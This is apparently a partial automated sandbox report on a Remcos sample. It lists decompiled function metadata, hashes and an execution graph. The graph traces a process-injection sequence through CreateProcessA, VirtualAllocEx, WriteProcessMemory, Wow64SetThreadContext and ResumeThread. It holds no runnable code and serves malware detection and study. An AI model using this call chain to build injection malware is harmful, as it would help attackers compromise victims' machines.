                                              control_flow_graph 276 7767698-776769e 277 77676a5-77676eb 276->277 278 77676a0-77676a4 276->278 280 77676ed-77676f9 277->280 281 77676fb-776772b Wow64SetThreadContext 277->281 278->277 280->281 283 7767734-7767764 281->283 284 776772d-7767733 281->284 284->283
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0776771E
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 804d9f93a245d099ae654ca79e4f9f2a0a59d2c46b0bcc8a1470f599c58027c0
                                              • Instruction ID: 36be4edd6f9315f22f19b5a0b4d2d368a89362db6a84eae5812f0c11ecb81b16
                                              • Opcode Fuzzy Hash: 804d9f93a245d099ae654ca79e4f9f2a0a59d2c46b0bcc8a1470f599c58027c0
                                              • Instruction Fuzzy Hash: D8216AB69003098FDB14DFAAC4857EEBBF5EF48354F14842AD859A7240D7789944CFA0
                                              Function 07767921 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 293 7767921-77679b5 ReadProcessMemory 296 77679b7-77679bd 293->296 297 77679be-77679ee 293->297 296->297
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077679A8
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: a6d9f71ebe588e5dee8dadf16bcd53d7e5cfefcbc631fba856035ce5b16aef3c
                                              • Instruction ID: c4a5b74f40611a88c72d4ad40d836ec7505f62a0aefabc08f228d59ecb46a0a1
                                              • Opcode Fuzzy Hash: a6d9f71ebe588e5dee8dadf16bcd53d7e5cfefcbc631fba856035ce5b16aef3c
                                              • Instruction Fuzzy Hash: CE2148B18003599FDB10CFAAC884BEEBBF5FF48310F10842AE958A7240D7799944CBA1
                                              Function 0141D5E8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 288 141d5e8-141d684 DuplicateHandle 289 141d686-141d68c 288->289 290 141d68d-141d6aa 288->290 289->290
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0141D677
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: a2b919bd3582e771cd6f9c3c581c13029c18a91c8d61b9bf5cae38e8a1bd991f
                                              • Instruction ID: fadfa764b218a7a252ae95d3a28bc6ca82eaf6bf875cebfefe0778767f08099f
                                              • Opcode Fuzzy Hash: a2b919bd3582e771cd6f9c3c581c13029c18a91c8d61b9bf5cae38e8a1bd991f
                                              • Instruction Fuzzy Hash: 482112B5C002499FDB10CFAAD584BEEBBF4EB08310F14842AE958A3350C378A954CF61
                                              Function 077676A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 301 77676a0-77676eb 304 77676ed-77676f9 301->304 305 77676fb-776772b Wow64SetThreadContext 301->305 304->305 307 7767734-7767764 305->307 308 776772d-7767733 305->308 308->307
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0776771E
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: cd2151abc3a30ee4d346c79e4b0c2ab962c8cc2aaa50db47d9929fcbf4b6c289
                                              • Instruction ID: 9da922077b48d237790422298b287d298b61bf4c4234148812bd1f9b6584443a
                                              • Opcode Fuzzy Hash: cd2151abc3a30ee4d346c79e4b0c2ab962c8cc2aaa50db47d9929fcbf4b6c289
                                              • Instruction Fuzzy Hash: 272147B1D003098FDB14CFAAC4857EEBBF5EF48364F14842AD859A7240C7789944CFA1
                                              Function 07767928 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 312 7767928-77679b5 ReadProcessMemory 315 77679b7-77679bd 312->315 316 77679be-77679ee 312->316 315->316
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077679A8
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 542b4056b025b035a1cb3c0844af69e806614180b55b1334fd0499e160d8d2bd
                                              • Instruction ID: fd6cf5010779a15f966a25f5556ac994936675db4ee6a6eb69fde9e6180b05ae
                                              • Opcode Fuzzy Hash: 542b4056b025b035a1cb3c0844af69e806614180b55b1334fd0499e160d8d2bd
                                              • Instruction Fuzzy Hash: 602125B18003499FDB10CFAAC884BEEFBF5FF48310F54842AE958A7240D7799944CBA1
                                              Function 0141D5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 320 141d5f0-141d684 DuplicateHandle 321 141d686-141d68c 320->321 322 141d68d-141d6aa 320->322 321->322
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0141D677
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: a3f177335f8745de23bd4276fa1797192e86e231406ecd25c3ef0bb6f4a9be13
                                              • Instruction ID: f74eeca916dafba0b2a09c0b99e24e0205df56d170528696db170c0fed5825de
                                              • Opcode Fuzzy Hash: a3f177335f8745de23bd4276fa1797192e86e231406ecd25c3ef0bb6f4a9be13
                                              • Instruction Fuzzy Hash: 5421C4B5D002499FDB10CF9AD584ADEFBF5EB48310F14841AE958A3350D378A954CF65
                                              Function 07767770 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077677E6
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 327cd2dcd31bc06ffdecbd67f437487a4565d50c25bb545a5cee31f0dc5a057f
                                              • Instruction ID: 1a00593fd4ec2831309d1bd3398c38e51819ca867fe55277b5289326e137f0f7
                                              • Opcode Fuzzy Hash: 327cd2dcd31bc06ffdecbd67f437487a4565d50c25bb545a5cee31f0dc5a057f
                                              • Instruction Fuzzy Hash: 031156B68002099FDB14DFAAC844BDFBBF9EF48314F248819E919A7250C7799944CFA0
                                              Function 07767778 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077677E6
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 966fd98f5489e188c47fe00b0b49bf6f1c19103edd62d5bf5e39438d071f5dfb
                                              • Instruction ID: ab61f3abf9a3e811967626cbc1c3280a6a4be238bc080e0211e1b6cfde944815
                                              • Opcode Fuzzy Hash: 966fd98f5489e188c47fe00b0b49bf6f1c19103edd62d5bf5e39438d071f5dfb
                                              • Instruction Fuzzy Hash: FC1137768003499FDB10DFAAC844BDEBBF5EF48310F148819E559A7250C7799544CFA1
                                              Function 077671B2 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a38741cb955c08c7b98ff878d0a5b6e7af3b987603897483f356796c0aefbe51
                                              • Instruction ID: d0673dc6d3027395a6bacdf37dbe109d294c63b6c1ce6b3215ffbdc1bd59594b
                                              • Opcode Fuzzy Hash: a38741cb955c08c7b98ff878d0a5b6e7af3b987603897483f356796c0aefbe51
                                              • Instruction Fuzzy Hash: CC118BB19003098FDB14DFAAC8447DEFBF5EB88364F24882AD459A7240C7796544CFA4
                                              Function 077671B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: b5f6c9106a022fe7ceeb0b5de6a08487272fa36be344a7a5104ea379ee032603
                                              • Instruction ID: eac37355204c0a471f2bf8e6fe6444790633887c8fcb6e2e7117922a5f8567f9
                                              • Opcode Fuzzy Hash: b5f6c9106a022fe7ceeb0b5de6a08487272fa36be344a7a5104ea379ee032603
                                              • Instruction Fuzzy Hash: 431158B18003498FDB20DFAAC4447DEFBF5EB48224F148829D519A7240C7796544CFA4
                                              Function 07764460 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0776B48D
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 0424bdf667c613e4b202b08e9867cc6a83df16fb9dd06a5e77895f41b8c4b017
                                              • Instruction ID: a67337e6c5e0b9353b3574a08708cb6385c492a068ec208d3b375e1b72a62c9a
                                              • Opcode Fuzzy Hash: 0424bdf667c613e4b202b08e9867cc6a83df16fb9dd06a5e77895f41b8c4b017
                                              • Instruction Fuzzy Hash: E911F5B58007499FDB10DF9AC448BDEBFF8EB49310F208819E954A7350D375A944CFA1
                                              Function 0141AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0141AF5E
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 4c63dcbb8be704a1870d82670ccdb42542271351c112711a682ca608b1b4fcea
                                              • Instruction ID: 609b232ccb9a31f1e428271bd7ef9b498191ef364d523861ad85a5367767c0b1
                                              • Opcode Fuzzy Hash: 4c63dcbb8be704a1870d82670ccdb42542271351c112711a682ca608b1b4fcea
                                              • Instruction Fuzzy Hash: A01110B5C006498FDB10CF9AC444BDEFBF4EB88324F20842AD428A7354C379A545CFA1
                                              Function 0776B42F Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0776B48D
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 12d06794857981924603548e1f6aa76c1da01dc8bf1a6cee77a9c020fc0c5693
                                              • Instruction ID: 1ddae272604c6e90ecede229be9264fe01628462c8dd86c6651a2cf32a75b689
                                              • Opcode Fuzzy Hash: 12d06794857981924603548e1f6aa76c1da01dc8bf1a6cee77a9c020fc0c5693
                                              • Instruction Fuzzy Hash: 7A11D0B98002499FDB10CF99D589BDEBBF8EB48320F20881AD958A7650D379A544CFA1
                                              Function 0100D3D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520359236.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_100d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c218a001e9167f51b608c12a15fba9a7e1e7ea00354149e8a1ecdb469e48a91
                                              • Instruction ID: 002d1f274ce87b41b33b5a4ed05b92ae73b547ba9a43c05409a1ffc1a0a2dd63
                                              • Opcode Fuzzy Hash: 1c218a001e9167f51b608c12a15fba9a7e1e7ea00354149e8a1ecdb469e48a91
                                              • Instruction Fuzzy Hash: F0214871500304DFEB02DF84C9C0B6ABBA5FB84324F24C1A9E9490B286C736E446CBB2
                                              Function 0101D1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520846034.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_101d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df2a61f14fc635e1cf1482f31bf529fc896b82dd00d4d179eebc30d17c49f686
                                              • Instruction ID: 954bc64ffb9928bb2dcba67005f7cb69c760feb9abb8d507ffc4b4b373073073
                                              • Opcode Fuzzy Hash: df2a61f14fc635e1cf1482f31bf529fc896b82dd00d4d179eebc30d17c49f686
                                              • Instruction Fuzzy Hash: 96214971504340EFDB01DF94D5C4B69BBA5FB94324F24C6ADE8894B28AC33AD406CB61
                                              Function 0101D01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520846034.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_101d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f30196f4bb3b4dde9b7ded88eaf6343b1d63ce49633a9627308e457c4296d429
                                              • Instruction ID: 4612a2dd6c5bafa73f46026dc99048ca46a45a6d799cb44d2f441aa5b6ee13a7
                                              • Opcode Fuzzy Hash: f30196f4bb3b4dde9b7ded88eaf6343b1d63ce49633a9627308e457c4296d429
                                              • Instruction Fuzzy Hash: B3212575504340DFDB16DF94D8C8B16BBA5FB84314F24C5ADE88A4B28AC33AD447CB62
                                              Function 0100D3D3 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520359236.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_100d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: 0d075a3d039a5012cbe7643377a640407535f3073ac79d9eb55b8cfbc45f5883
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 7F11DF72404240CFDB02CF84D5C0B56BFB1FB84324F24C2AAD8490B697C33AE456CBA2
                                              Function 0101D017 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520846034.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_101d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: 3094a24bcad1ac7375b10ec728941a7705934b2af73d4ee0b19ada7a321a17af
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: 57118E75504280DFDB16CF54D5C4B15BBA2FB44314F24C6AAE8494B69AC33AD44ACB62
                                              Function 0101D1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520846034.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_101d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: 52c4e030545ed9c2980995f2eeb44f1d2fc811d1d3b6b6c44bbe094fd1f51d8d
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: A611BB75504280DFCB02CF54C5C4B55BBA1FB84224F28C6AAD8894B69AC33AD44ACB61
                                              Function 0100D759 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520359236.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_100d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78b67a22e2e3f56063e27da83039ff5a3932d2435c1fe9a7eee179a38a193fd6
                                              • Instruction ID: 84e8c6cb4c85c297fbe05036090fcce1542063ce62e942f5e141758e71769914
                                              • Opcode Fuzzy Hash: 78b67a22e2e3f56063e27da83039ff5a3932d2435c1fe9a7eee179a38a193fd6
                                              • Instruction Fuzzy Hash: 6B01A7311047809FF7524AD5CD84B6AFFD8EF41224F18845AED4D4A2C6E7799440CBB2
                                              Function 0100D758 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520359236.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_100d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b05aa9d8bf42f2f9852c1c6a2d1393c19352dbebe463eb990d459bc1c21a2601
                                              • Instruction ID: 95fa11d96b3bdd8e5fd8b5e5628015119ae87ff05a989bed8da1c10a3541be31
                                              • Opcode Fuzzy Hash: b05aa9d8bf42f2f9852c1c6a2d1393c19352dbebe463eb990d459bc1c21a2601
                                              • Instruction Fuzzy Hash: 59F0AF310043809EE7118A4AC984B62FFE8EB40634F18C49AED484A2C6D3799844CBB1

                                              Execution Graph

                                              Execution Coverage:10.3%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:167
                                              Total number of Limit Nodes:8
                                              execution_graph 23859 15a4668 23860 15a4672 23859->23860 23862 15a4758 23859->23862 23863 15a477d 23862->23863 23867 15a4858 23863->23867 23871 15a4868 23863->23871 23869 15a4868 23867->23869 23868 15a496c 23868->23868 23869->23868 23875 15a44b4 23869->23875 23873 15a488f 23871->23873 23872 15a496c 23873->23872 23874 15a44b4 CreateActCtxA 23873->23874 23874->23872 23876 15a58f8 CreateActCtxA 23875->23876 23878 15a59bb 23876->23878 23878->23878 23879 74caeb8 23880 74caede 23879->23880 23881 74cb043 23879->23881 23880->23881 23883 74c4460 23880->23883 23884 74cb138 PostMessageW 23883->23884 23885 74cb1a4 23884->23885 23885->23880 23886 74c8079 23887 74c7edc 23886->23887 23888 74c815b 23887->23888 23889 74c9c9e 12 API calls 23887->23889 23890 74c9c28 12 API calls 23887->23890 23891 74c9c38 12 API calls 23887->23891 23889->23888 23890->23888 23891->23888 23685 15ad5f0 DuplicateHandle 23686 15ad686 23685->23686 23687 15aac10 23691 15aad08 23687->23691 23696 15aacf9 23687->23696 23688 15aac1f 23692 15aad3c 23691->23692 23693 15aad19 23691->23693 23692->23688 23693->23692 23694 15aaf40 GetModuleHandleW 23693->23694 23695 15aaf6d 23694->23695 23695->23688 23697 15aad3c 23696->23697 23698 15aad19 23696->23698 23697->23688 23698->23697 23699 15aaf40 GetModuleHandleW 23698->23699 23700 15aaf6d 23699->23700 23700->23688 23892 15acfa0 23893 15acfe6 GetCurrentProcess 23892->23893 23895 15ad038 GetCurrentThread 23893->23895 23896 15ad031 23893->23896 23897 15ad06e 23895->23897 23898 15ad075 GetCurrentProcess 23895->23898 23896->23895 23897->23898 23900 15ad0ab 23898->23900 23899 15ad0d3 GetCurrentThreadId 23901 15ad104 23899->23901 23900->23899 23701 74c8200 23702 74c8180 23701->23702 23707 74c9c9e 23702->23707 23723 74c9c38 23702->23723 23738 74c9c28 23702->23738 23703 74c82b3 23708 74c9c2c 23707->23708 23710 74c9ca1 23707->23710 23709 74c9c5a 23708->23709 23753 74ca6e6 23708->23753 23758 74ca205 23708->23758 23763 74ca355 23708->23763 23768 74ca954 23708->23768 23773 74ca454 23708->23773 23777 74ca0f9 23708->23777 23782 74ca159 23708->23782 23787 74ca398 23708->23787 23792 74ca25f 23708->23792 23797 74ca17e 23708->23797 23801 74ca2bd 23708->23801 23806 74ca2dd 23708->23806 23709->23703 23710->23703 23724 74c9c52 23723->23724 23725 74c9c5a 23724->23725 23726 74ca205 2 API calls 23724->23726 23727 74ca6e6 2 API calls 23724->23727 23728 74ca2dd 2 API calls 23724->23728 23729 74ca2bd 2 API calls 23724->23729 23730 74ca17e 2 API calls 23724->23730 23731 74ca25f 2 API calls 23724->23731 23732 74ca398 2 API calls 23724->23732 23733 74ca159 2 API calls 23724->23733 23734 74ca0f9 2 API calls 23724->23734 23735 74ca454 2 API calls 23724->23735 23736 74ca954 2 API calls 23724->23736 23737 74ca355 2 API calls 23724->23737 23725->23703 23726->23725 23727->23725 23728->23725 23729->23725 23730->23725 23731->23725 23732->23725 23733->23725 23734->23725 23735->23725 23736->23725 23737->23725 23739 74c9c2c 23738->23739 23740 74c9c5a 23739->23740 23741 74ca205 2 API calls 23739->23741 23742 74ca6e6 2 API calls 23739->23742 23743 74ca2dd 2 API calls 23739->23743 23744 74ca2bd 2 API calls 23739->23744 23745 74ca17e 2 API calls 23739->23745 23746 74ca25f 2 API calls 23739->23746 23747 74ca398 2 API calls 23739->23747 23748 74ca159 2 API calls 23739->23748 23749 74ca0f9 2 API calls 23739->23749 23750 74ca454 2 API calls 23739->23750 23751 74ca954 2 API calls 23739->23751 23752 74ca355 2 API calls 23739->23752 23740->23703 23741->23740 23742->23740 23743->23740 23744->23740 23745->23740 23746->23740 23747->23740 23748->23740 23749->23740 23750->23740 23751->23740 23752->23740 23754 74ca6ec 23753->23754 23811 74c71b8 23754->23811 23815 74c71b7 23754->23815 23755 74ca737 23755->23709 23760 74ca165 23758->23760 23759 74caa17 23760->23758 23760->23759 23819 74c7838 23760->23819 23823 74c7837 23760->23823 23764 74ca362 23763->23764 23766 74c71b8 ResumeThread 23764->23766 23767 74c71b7 ResumeThread 23764->23767 23765 74ca737 23765->23709 23766->23765 23767->23765 23769 74caa89 23768->23769 23827 74c769f 23769->23827 23831 74c76a0 23769->23831 23770 74caaa4 23775 74c769f Wow64SetThreadContext 23773->23775 23776 74c76a0 Wow64SetThreadContext 23773->23776 23774 74ca46e 23775->23774 23776->23774 23778 74ca10c 23777->23778 23835 74c7abf 23778->23835 23839 74c7ac0 23778->23839 23783 74ca165 23782->23783 23784 74caa17 23783->23784 23785 74c7838 WriteProcessMemory 23783->23785 23786 74c7837 WriteProcessMemory 23783->23786 23785->23783 23786->23783 23788 74ca2e4 23787->23788 23843 74c7928 23788->23843 23847 74c7921 23788->23847 23789 74ca1e2 23789->23789 23793 74ca322 23792->23793 23851 74c7778 23793->23851 23855 74c7777 23793->23855 23794 74ca340 23799 74c7838 WriteProcessMemory 23797->23799 23800 74c7837 WriteProcessMemory 23797->23800 23798 74ca1ac 23798->23709 23799->23798 23800->23798 23802 74ca2c3 23801->23802 23804 74c7838 WriteProcessMemory 23802->23804 23805 74c7837 WriteProcessMemory 23802->23805 23803 74ca5b7 23804->23803 23805->23803 23807 74ca2e3 23806->23807 23808 74ca1e2 23807->23808 23809 74c7928 ReadProcessMemory 23807->23809 23810 74c7921 ReadProcessMemory 23807->23810 23808->23808 23809->23808 23810->23808 23812 74c71f8 ResumeThread 23811->23812 23814 74c7229 23812->23814 23814->23755 23816 74c71f8 ResumeThread 23815->23816 23818 74c7229 23816->23818 23818->23755 23820 74c7880 WriteProcessMemory 23819->23820 23822 74c78d7 23820->23822 23822->23760 23824 74c7880 WriteProcessMemory 23823->23824 23826 74c78d7 23824->23826 23826->23760 23828 74c76e5 Wow64SetThreadContext 23827->23828 23830 74c772d 23828->23830 23830->23770 23832 74c76e5 Wow64SetThreadContext 23831->23832 23834 74c772d 23832->23834 23834->23770 23836 74c7b49 CreateProcessA 23835->23836 23838 74c7d0b 23836->23838 23838->23838 23840 74c7b49 CreateProcessA 23839->23840 23842 74c7d0b 23840->23842 23844 74c7973 ReadProcessMemory 23843->23844 23846 74c79b7 23844->23846 23846->23789 23848 74c7973 ReadProcessMemory 23847->23848 23850 74c79b7 23848->23850 23850->23789 23852 74c77b8 VirtualAllocEx 23851->23852 23854 74c77f5 23852->23854 23854->23794 23856 74c77b8 VirtualAllocEx 23855->23856 23858 74c77f5 23856->23858 23858->23794

                                              Executed Functions

                                              Function 015ACF90 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 015AD01E
                                              • GetCurrentThread.KERNEL32 ref: 015AD05B
                                              • GetCurrentProcess.KERNEL32 ref: 015AD098
                                              • GetCurrentThreadId.KERNEL32 ref: 015AD0F1
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597561858.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_15a0000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: e55020506258f33070dc472f9b0f8dcf0052b901c762d37c38d5b1c631513b9f
                                              • Instruction ID: 7e627856fcead53d7b98ee2d116ea0ecbfd027d7fc0909245dff5c5bbd7cc920
                                              • Opcode Fuzzy Hash: e55020506258f33070dc472f9b0f8dcf0052b901c762d37c38d5b1c631513b9f
                                              • Instruction Fuzzy Hash: FF5168B49017498FEB14DFA9D54879EBBF1BF88304F208459D409AB350D7745944CB25
                                              Function 015ACFA0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
